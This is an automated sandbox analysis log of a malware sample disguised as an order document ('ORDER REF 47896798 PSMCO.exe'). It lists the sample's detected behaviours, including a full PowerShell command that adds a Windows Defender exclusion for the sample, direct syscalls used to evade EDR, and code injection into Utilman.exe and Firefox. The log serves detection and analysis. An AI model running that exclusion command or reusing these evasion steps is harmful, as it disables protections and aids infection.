                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0194096E mov eax, dword ptr fs:[00000030h]5_2_0194096E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0194096E mov edx, dword ptr fs:[00000030h]5_2_0194096E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0194096E mov eax, dword ptr fs:[00000030h]5_2_0194096E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198C89D mov eax, dword ptr fs:[00000030h]5_2_0198C89D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900887 mov eax, dword ptr fs:[00000030h]5_2_01900887
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E8C0 mov eax, dword ptr fs:[00000030h]5_2_0192E8C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D08C0 mov eax, dword ptr fs:[00000030h]5_2_019D08C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C8F9 mov eax, dword ptr fs:[00000030h]5_2_0193C8F9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C8F9 mov eax, dword ptr fs:[00000030h]5_2_0193C8F9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CA8E4 mov eax, dword ptr fs:[00000030h]5_2_019CA8E4
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198C810 mov eax, dword ptr fs:[00000030h]5_2_0198C810
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A483A mov eax, dword ptr fs:[00000030h]5_2_019A483A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A483A mov eax, dword ptr fs:[00000030h]5_2_019A483A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A830 mov eax, dword ptr fs:[00000030h]5_2_0193A830
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01922835 mov eax, dword ptr fs:[00000030h]5_2_01922835
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01922835 mov eax, dword ptr fs:[00000030h]5_2_01922835
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01922835 mov eax, dword ptr fs:[00000030h]5_2_01922835
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01922835 mov ecx, dword ptr fs:[00000030h]5_2_01922835
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01922835 mov eax, dword ptr fs:[00000030h]5_2_01922835
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01922835 mov eax, dword ptr fs:[00000030h]5_2_01922835
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01930854 mov eax, dword ptr fs:[00000030h]5_2_01930854
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904859 mov eax, dword ptr fs:[00000030h]5_2_01904859
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904859 mov eax, dword ptr fs:[00000030h]5_2_01904859
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01912840 mov ecx, dword ptr fs:[00000030h]5_2_01912840
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01996870 mov eax, dword ptr fs:[00000030h]5_2_01996870
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01996870 mov eax, dword ptr fs:[00000030h]5_2_01996870
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198E872 mov eax, dword ptr fs:[00000030h]5_2_0198E872
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198E872 mov eax, dword ptr fs:[00000030h]5_2_0198E872
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B4BB0 mov eax, dword ptr fs:[00000030h]5_2_019B4BB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B4BB0 mov eax, dword ptr fs:[00000030h]5_2_019B4BB0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910BBE mov eax, dword ptr fs:[00000030h]5_2_01910BBE
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910BBE mov eax, dword ptr fs:[00000030h]5_2_01910BBE
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AEBD0 mov eax, dword ptr fs:[00000030h]5_2_019AEBD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01920BCB mov eax, dword ptr fs:[00000030h]5_2_01920BCB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01920BCB mov eax, dword ptr fs:[00000030h]5_2_01920BCB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01920BCB mov eax, dword ptr fs:[00000030h]5_2_01920BCB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900BCD mov eax, dword ptr fs:[00000030h]5_2_01900BCD
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900BCD mov eax, dword ptr fs:[00000030h]5_2_01900BCD
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900BCD mov eax, dword ptr fs:[00000030h]5_2_01900BCD
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908BF0 mov eax, dword ptr fs:[00000030h]5_2_01908BF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908BF0 mov eax, dword ptr fs:[00000030h]5_2_01908BF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908BF0 mov eax, dword ptr fs:[00000030h]5_2_01908BF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198CBF0 mov eax, dword ptr fs:[00000030h]5_2_0198CBF0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192EBFC mov eax, dword ptr fs:[00000030h]5_2_0192EBFC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197EB1D mov eax, dword ptr fs:[00000030h]5_2_0197EB1D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4B00 mov eax, dword ptr fs:[00000030h]5_2_019D4B00
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192EB20 mov eax, dword ptr fs:[00000030h]5_2_0192EB20
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192EB20 mov eax, dword ptr fs:[00000030h]5_2_0192EB20
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C8B28 mov eax, dword ptr fs:[00000030h]5_2_019C8B28
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C8B28 mov eax, dword ptr fs:[00000030h]5_2_019C8B28
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019AEB50 mov eax, dword ptr fs:[00000030h]5_2_019AEB50
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D2B57 mov eax, dword ptr fs:[00000030h]5_2_019D2B57
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D2B57 mov eax, dword ptr fs:[00000030h]5_2_019D2B57
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D2B57 mov eax, dword ptr fs:[00000030h]5_2_019D2B57
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D2B57 mov eax, dword ptr fs:[00000030h]5_2_019D2B57
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B4B4B mov eax, dword ptr fs:[00000030h]5_2_019B4B4B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B4B4B mov eax, dword ptr fs:[00000030h]5_2_019B4B4B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A8B42 mov eax, dword ptr fs:[00000030h]5_2_019A8B42
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01996B40 mov eax, dword ptr fs:[00000030h]5_2_01996B40
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01996B40 mov eax, dword ptr fs:[00000030h]5_2_01996B40
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CAB40 mov eax, dword ptr fs:[00000030h]5_2_019CAB40
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F8B50 mov eax, dword ptr fs:[00000030h]5_2_018F8B50
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FCB7E mov eax, dword ptr fs:[00000030h]5_2_018FCB7E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938A90 mov edx, dword ptr fs:[00000030h]5_2_01938A90
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190EA80 mov eax, dword ptr fs:[00000030h]5_2_0190EA80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4A80 mov eax, dword ptr fs:[00000030h]5_2_019D4A80
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908AA0 mov eax, dword ptr fs:[00000030h]5_2_01908AA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908AA0 mov eax, dword ptr fs:[00000030h]5_2_01908AA0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01956AA4 mov eax, dword ptr fs:[00000030h]5_2_01956AA4
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900AD0 mov eax, dword ptr fs:[00000030h]5_2_01900AD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01934AD0 mov eax, dword ptr fs:[00000030h]5_2_01934AD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01934AD0 mov eax, dword ptr fs:[00000030h]5_2_01934AD0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01956ACC mov eax, dword ptr fs:[00000030h]5_2_01956ACC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01956ACC mov eax, dword ptr fs:[00000030h]5_2_01956ACC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01956ACC mov eax, dword ptr fs:[00000030h]5_2_01956ACC
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193AAEE mov eax, dword ptr fs:[00000030h]5_2_0193AAEE
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193AAEE mov eax, dword ptr fs:[00000030h]5_2_0193AAEE
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198CA11 mov eax, dword ptr fs:[00000030h]5_2_0198CA11
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01924A35 mov eax, dword ptr fs:[00000030h]5_2_01924A35
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01924A35 mov eax, dword ptr fs:[00000030h]5_2_01924A35
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193CA38 mov eax, dword ptr fs:[00000030h]5_2_0193CA38
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193CA24 mov eax, dword ptr fs:[00000030h]5_2_0193CA24
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192EA2E mov eax, dword ptr fs:[00000030h]5_2_0192EA2E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906A50 mov eax, dword ptr fs:[00000030h]5_2_01906A50
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906A50 mov eax, dword ptr fs:[00000030h]5_2_01906A50
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906A50 mov eax, dword ptr fs:[00000030h]5_2_01906A50
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906A50 mov eax, dword ptr fs:[00000030h]5_2_01906A50
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906A50 mov eax, dword ptr fs:[00000030h]5_2_01906A50
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01906A50 mov eax, dword ptr fs:[00000030h]5_2_01906A50
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"Jump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtClose: Direct from: 0x77382B6C
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory written: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: NULL target: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeSection loaded: NULL target: C:\Windows\SysWOW64\Utilman.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\Utilman.exeThread register set: target process: 5612Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\Utilman.exeThread APC queued: target process: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess created: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"Jump to behavior
